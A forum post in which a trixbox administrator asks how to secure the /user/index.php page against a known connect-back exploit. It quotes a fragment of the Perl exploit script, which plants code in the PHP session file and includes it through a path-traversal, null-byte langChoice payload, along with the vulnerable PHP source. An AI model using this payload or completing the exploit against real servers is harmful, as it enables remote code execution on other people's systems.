hello i have tribox installed and recently i found out that there is an exploit with connect-back that u can get access to the server the problem is in the /user/index.php i found out the exploit and its made in perl Code: usage() unless @ARGV; my $url = "http://$ARGV[0]/user/index.php"; my $ua = LWP::UserAgent->new; my $cookie_jar = HTTP::Cookies->new; $ua->cookie_jar($cookie_jar); menu(); sub execScript{ my $scriptCode = shift; post($scriptCode); my $phpsessionid = extractPHPSID($cookie_jar->as_string); post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); } Code (markup): its getting access to /tmp .. ive tried to chmod 755 /tmp but the index doesnt work it gives an error Code: <?php apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"])))); apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"])))); ini_set("error_reporting","E_ALL & ~E_NOTICE"); //session_start(); require 'includes/smartysetup.php'; require_once("includes/xajax.inc.php"); include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version $smarty->assign("tbversion",tbversion()); $smarty->assign("title","trixbox - User Mode"); ... ?> Code (markup): ive tried to to comment sesion_start(); it works but does it gives any problems? how to i secure it to keep hackers out?